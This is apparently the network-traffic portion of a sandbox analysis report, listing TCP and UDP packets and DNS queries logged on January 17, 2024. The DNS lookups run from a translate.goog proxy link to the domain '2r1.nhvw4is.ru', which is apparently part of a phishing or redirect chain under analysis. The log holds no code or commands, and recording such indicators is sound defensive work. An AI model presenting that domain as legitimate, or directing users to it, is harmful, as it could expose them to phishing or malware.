                                                                                                                                                              Jan 17, 2024 17:39:34.892513037 CET44349816172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.892844915 CET49816443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.892932892 CET44349816172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.893214941 CET49816443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.896289110 CET44349817172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.896506071 CET49817443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.896533012 CET44349817172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.897908926 CET44349817172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.897980928 CET49817443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.929909945 CET44349815172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.933902979 CET44349816172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.953212023 CET49817443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.953680992 CET49817443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.953737020 CET44349817172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.995820999 CET49817443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:34.995853901 CET44349817172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.045048952 CET49817443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:35.080615044 CET44349818152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.080962896 CET49818443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:35.080976009 CET44349818152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.082524061 CET44349818152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.082588911 CET49818443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:35.083700895 CET49818443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:35.083772898 CET44349818152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.083884001 CET49818443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:35.083892107 CET44349818152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.137686968 CET49818443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:35.229695082 CET44349815172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.229871035 CET44349815172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.230160952 CET49815443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:35.230983973 CET49815443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:35.231004000 CET44349815172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.244848967 CET44349818152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.244940996 CET44349818152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.245028019 CET49818443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:35.245034933 CET44349818152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.245085955 CET49818443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:35.264981031 CET49818443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:35.265002966 CET44349818152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.295888901 CET44349816172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.295969963 CET44349816172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.296020985 CET44349816172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.296030045 CET49816443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:35.296055079 CET44349816172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.296109915 CET44349816172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.296138048 CET49816443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:35.296144009 CET44349816172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.296190023 CET49816443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:35.296197891 CET44349816172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.296291113 CET44349816172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.296355009 CET49816443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:35.297107935 CET49816443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:35.297120094 CET44349816172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.297965050 CET44349817172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.298006058 CET44349817172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.298062086 CET49817443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:35.298089981 CET44349817172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.298336029 CET44349817172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.298361063 CET44349817172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.298388958 CET44349817172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.298403025 CET49817443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:35.298412085 CET44349817172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.298433065 CET49817443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:35.298540115 CET44349817172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.298587084 CET49817443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:35.298907995 CET49817443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:35.298922062 CET44349817172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.427359104 CET49819443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:35.427407980 CET44349819152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.427473068 CET49819443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:35.428409100 CET49819443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:35.428433895 CET44349819152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.700723886 CET44349819152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.702155113 CET49819443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:35.702188969 CET44349819152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.703241110 CET44349819152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.703311920 CET49819443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:35.703682899 CET49819443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:35.703764915 CET44349819152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.704117060 CET49819443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:35.704125881 CET44349819152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.747216940 CET49819443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:35.880410910 CET44349819152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.880582094 CET44349819152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.880641937 CET49819443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:35.880666018 CET44349819152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.880723953 CET49819443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:35.880753040 CET44349819152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:35.880810976 CET49819443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:35.883012056 CET49819443192.168.2.4152.199.4.73
                                                                                                                                                              Jan 17, 2024 17:39:35.883029938 CET44349819152.199.4.73192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:46.130150080 CET44349800104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:46.130352020 CET44349800104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:46.130484104 CET49800443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:46.451596975 CET49800443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:46.451631069 CET44349800104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:53.801863909 CET49823443192.168.2.452.165.165.26
                                                                                                                                                              Jan 17, 2024 17:39:53.801903963 CET4434982352.165.165.26192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:53.801996946 CET49823443192.168.2.452.165.165.26
                                                                                                                                                              Jan 17, 2024 17:39:53.802604914 CET49823443192.168.2.452.165.165.26
                                                                                                                                                              Jan 17, 2024 17:39:53.802613974 CET4434982352.165.165.26192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:54.218993902 CET4434982352.165.165.26192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:54.219090939 CET49823443192.168.2.452.165.165.26
                                                                                                                                                              Jan 17, 2024 17:39:54.224064112 CET49823443192.168.2.452.165.165.26
                                                                                                                                                              Jan 17, 2024 17:39:54.224075079 CET4434982352.165.165.26192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:54.224395037 CET4434982352.165.165.26192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:54.240463972 CET49823443192.168.2.452.165.165.26
                                                                                                                                                              Jan 17, 2024 17:39:54.285901070 CET4434982352.165.165.26192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:54.618808031 CET4434982352.165.165.26192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:54.618839979 CET4434982352.165.165.26192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:54.618861914 CET4434982352.165.165.26192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:54.618927002 CET49823443192.168.2.452.165.165.26
                                                                                                                                                              Jan 17, 2024 17:39:54.618941069 CET4434982352.165.165.26192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:54.618988991 CET49823443192.168.2.452.165.165.26
                                                                                                                                                              Jan 17, 2024 17:39:54.619025946 CET4434982352.165.165.26192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:54.619074106 CET4434982352.165.165.26192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:54.619082928 CET49823443192.168.2.452.165.165.26
                                                                                                                                                              Jan 17, 2024 17:39:54.619095087 CET4434982352.165.165.26192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:54.619131088 CET49823443192.168.2.452.165.165.26
                                                                                                                                                              Jan 17, 2024 17:39:54.619136095 CET4434982352.165.165.26192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:54.619159937 CET4434982352.165.165.26192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:54.619200945 CET49823443192.168.2.452.165.165.26
                                                                                                                                                              Jan 17, 2024 17:39:54.627887011 CET49823443192.168.2.452.165.165.26
                                                                                                                                                              Jan 17, 2024 17:39:54.627903938 CET4434982352.165.165.26192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:54.627933979 CET49823443192.168.2.452.165.165.26
                                                                                                                                                              Jan 17, 2024 17:39:54.627938986 CET4434982352.165.165.26192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:02.448208094 CET49825443192.168.2.4142.251.40.196
                                                                                                                                                              Jan 17, 2024 17:40:02.448286057 CET44349825142.251.40.196192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:02.448363066 CET49825443192.168.2.4142.251.40.196
                                                                                                                                                              Jan 17, 2024 17:40:02.448704004 CET49825443192.168.2.4142.251.40.196
                                                                                                                                                              Jan 17, 2024 17:40:02.448736906 CET44349825142.251.40.196192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:02.719681978 CET44349825142.251.40.196192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:02.762878895 CET49825443192.168.2.4142.251.40.196
                                                                                                                                                              Jan 17, 2024 17:40:02.853821993 CET49825443192.168.2.4142.251.40.196
                                                                                                                                                              Jan 17, 2024 17:40:02.853847980 CET44349825142.251.40.196192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:02.855318069 CET44349825142.251.40.196192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:02.856230974 CET49825443192.168.2.4142.251.40.196
                                                                                                                                                              Jan 17, 2024 17:40:02.856720924 CET44349825142.251.40.196192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:02.903471947 CET49825443192.168.2.4142.251.40.196
                                                                                                                                                              Jan 17, 2024 17:40:08.872143030 CET4972380192.168.2.472.21.81.240
                                                                                                                                                              Jan 17, 2024 17:40:08.872324944 CET4972480192.168.2.472.21.81.240
                                                                                                                                                              Jan 17, 2024 17:40:08.963134050 CET804972372.21.81.240192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:08.963205099 CET4972380192.168.2.472.21.81.240
                                                                                                                                                              Jan 17, 2024 17:40:08.963371992 CET804972472.21.81.240192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:08.963618994 CET4972480192.168.2.472.21.81.240
                                                                                                                                                              Jan 17, 2024 17:40:12.723630905 CET44349825142.251.40.196192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:12.723705053 CET44349825142.251.40.196192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:12.723774910 CET49825443192.168.2.4142.251.40.196
                                                                                                                                                              Jan 17, 2024 17:40:14.722047091 CET49825443192.168.2.4142.251.40.196
                                                                                                                                                              Jan 17, 2024 17:40:14.722078085 CET44349825142.251.40.196192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:16.137569904 CET49799443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:40:16.137597084 CET44349799151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:27.536063910 CET49826443192.168.2.4142.250.81.238
                                                                                                                                                              Jan 17, 2024 17:40:27.536098003 CET44349826142.250.81.238192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:27.536176920 CET49826443192.168.2.4142.250.81.238
                                                                                                                                                              Jan 17, 2024 17:40:27.536722898 CET49826443192.168.2.4142.250.81.238
                                                                                                                                                              Jan 17, 2024 17:40:27.536739111 CET44349826142.250.81.238192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:27.732537985 CET44349826142.250.81.238192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:27.733916044 CET49826443192.168.2.4142.250.81.238
                                                                                                                                                              Jan 17, 2024 17:40:27.733935118 CET44349826142.250.81.238192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:27.734307051 CET44349826142.250.81.238192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:27.734436035 CET49826443192.168.2.4142.250.81.238
                                                                                                                                                              Jan 17, 2024 17:40:27.734983921 CET44349826142.250.81.238192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:27.735117912 CET49826443192.168.2.4142.250.81.238
                                                                                                                                                              Jan 17, 2024 17:40:27.736510992 CET49826443192.168.2.4142.250.81.238
                                                                                                                                                              Jan 17, 2024 17:40:27.736510992 CET49826443192.168.2.4142.250.81.238
                                                                                                                                                              Jan 17, 2024 17:40:27.736572981 CET44349826142.250.81.238192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:27.778388023 CET49826443192.168.2.4142.250.81.238
                                                                                                                                                              Jan 17, 2024 17:40:27.778403044 CET44349826142.250.81.238192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:27.825289965 CET49826443192.168.2.4142.250.81.238
                                                                                                                                                              Jan 17, 2024 17:40:27.952899933 CET44349826142.250.81.238192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:27.953030109 CET44349826142.250.81.238192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:27.953090906 CET49826443192.168.2.4142.250.81.238
                                                                                                                                                              Jan 17, 2024 17:40:27.954616070 CET49826443192.168.2.4142.250.81.238
                                                                                                                                                              Jan 17, 2024 17:40:27.954634905 CET44349826142.250.81.238192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:32.442293882 CET49799443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:40:32.442454100 CET44349799151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:32.442548990 CET49799443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:41:02.699696064 CET49827443192.168.2.4142.251.40.196
                                                                                                                                                              Jan 17, 2024 17:41:02.699779987 CET44349827142.251.40.196192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:41:02.699919939 CET49827443192.168.2.4142.251.40.196
                                                                                                                                                              Jan 17, 2024 17:41:02.701899052 CET49827443192.168.2.4142.251.40.196
                                                                                                                                                              Jan 17, 2024 17:41:02.701937914 CET44349827142.251.40.196192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:41:02.972109079 CET44349827142.251.40.196192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:41:02.981276989 CET49827443192.168.2.4142.251.40.196
                                                                                                                                                              Jan 17, 2024 17:41:02.981311083 CET44349827142.251.40.196192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:41:02.982398033 CET44349827142.251.40.196192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:41:02.982845068 CET49827443192.168.2.4142.251.40.196
                                                                                                                                                              Jan 17, 2024 17:41:02.983026028 CET44349827142.251.40.196192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:41:03.031434059 CET49827443192.168.2.4142.251.40.196
                                                                                                                                                              Jan 17, 2024 17:41:12.987972021 CET44349827142.251.40.196192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:41:12.988132000 CET44349827142.251.40.196192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:41:12.988250017 CET49827443192.168.2.4142.251.40.196
                                                                                                                                                              Jan 17, 2024 17:41:14.453279972 CET49827443192.168.2.4142.251.40.196
                                                                                                                                                              Jan 17, 2024 17:41:14.453355074 CET44349827142.251.40.196192.168.2.4
                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Jan 17, 2024 17:38:58.102031946 CET6070953192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:38:58.102482080 CET6331353192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:38:58.103039980 CET5857753192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:38:58.103380919 CET5894653192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:38:58.104005098 CET5974453192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:38:58.104218006 CET5670553192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:38:58.132419109 CET53555731.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:38:58.191220999 CET53607091.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:38:58.191487074 CET53633131.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:38:58.191688061 CET53585771.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:38:58.194926977 CET53589461.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:38:58.201025963 CET53597441.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:38:58.201601028 CET53567051.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:38:58.749639034 CET53495331.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:38:58.898108006 CET5013253192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:38:58.898451090 CET4942053192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:38:58.994399071 CET53501321.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:38:59.001436949 CET53494201.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:00.803657055 CET5462053192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:39:00.804002047 CET5550153192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:39:00.896409988 CET53555011.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:01.193749905 CET53546201.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:02.391635895 CET5631453192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:39:02.392189026 CET6229053192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:39:02.479775906 CET53563141.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:02.480676889 CET53622901.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:02.515868902 CET6502253192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:39:02.516616106 CET5844453192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:39:02.519135952 CET5331853192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:39:02.519818068 CET5138053192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:39:02.604626894 CET53650221.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:02.604857922 CET53584441.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:02.607269049 CET53533181.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:02.608275890 CET53513801.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.832911968 CET5523253192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:39:03.833858967 CET5693553192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:39:03.921634912 CET53552321.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:03.923578024 CET53569351.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.897682905 CET5077653192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:39:04.898051977 CET5309153192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:39:04.986287117 CET53507761.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:04.987078905 CET53530911.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:06.855108023 CET5988553192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:39:06.855462074 CET5153753192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:39:06.943078041 CET53598851.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:06.944242954 CET53515371.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:10.900367022 CET53621291.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:17.383618116 CET53537951.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.462846041 CET138138192.168.2.4192.168.2.255
                                                                                                                                                              Jan 17, 2024 17:39:30.932518005 CET5997953192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:39:30.932857037 CET6046653192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:39:31.289622068 CET53599791.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.289722919 CET53604661.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:33.597078085 CET53509751.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:34.704862118 CET6032153192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:39:34.705019951 CET4933153192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:39:35.336842060 CET6295453192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:39:35.337032080 CET5868153192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:39:36.165182114 CET53622231.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:58.009958982 CET53632991.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:59.072323084 CET53534411.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:27.025391102 CET53609071.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:27.437604904 CET6471153192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:40:27.438174009 CET5691153192.168.2.41.1.1.1
                                                                                                                                                              Jan 17, 2024 17:40:27.525094032 CET53647111.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:40:27.527015924 CET53569111.1.1.1192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:41:12.415366888 CET53546311.1.1.1192.168.2.4
                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                              Jan 17, 2024 17:38:58.102031946 CET192.168.2.41.1.1.10xb3a6Standard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:38:58.102482080 CET192.168.2.41.1.1.10x1365Standard query (0)clients2.google.com65IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:38:58.103039980 CET192.168.2.41.1.1.10xfe11Standard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:38:58.103380919 CET192.168.2.41.1.1.10xbbf1Standard query (0)accounts.google.com65IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:38:58.104005098 CET192.168.2.41.1.1.10xe211Standard query (0)cascade-madmimi-com.translate.googA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:38:58.104218006 CET192.168.2.41.1.1.10x7eccStandard query (0)cascade-madmimi-com.translate.goog65IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:38:58.898108006 CET192.168.2.41.1.1.10x1b1Standard query (0)cascade-madmimi-com.translate.googA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:38:58.898451090 CET192.168.2.41.1.1.10xef5bStandard query (0)cascade-madmimi-com.translate.goog65IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:00.803657055 CET192.168.2.41.1.1.10xe40dStandard query (0)2r1.nhvw4is.ruA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:00.804002047 CET192.168.2.41.1.1.10xf11fStandard query (0)2r1.nhvw4is.ru65IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:02.391635895 CET192.168.2.41.1.1.10x60d9Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:02.392189026 CET192.168.2.41.1.1.10xace6Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:02.515868902 CET192.168.2.41.1.1.10x8394Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:02.516616106 CET192.168.2.41.1.1.10x17daStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:02.519135952 CET192.168.2.41.1.1.10x7601Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:02.519818068 CET192.168.2.41.1.1.10xc9deStandard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:03.832911968 CET192.168.2.41.1.1.10x580fStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:03.833858967 CET192.168.2.41.1.1.10x2885Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:04.897682905 CET192.168.2.41.1.1.10x357dStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:04.898051977 CET192.168.2.41.1.1.10xe995Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:06.855108023 CET192.168.2.41.1.1.10x312dStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:06.855462074 CET192.168.2.41.1.1.10x7c6Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                              Jan 17, 2024 17:39:30.932518005 CET192.168.2.41.1.1.10xb9baStandard query (0)2r1.nhvw4is.ruA (IP address)IN (0x0001)false
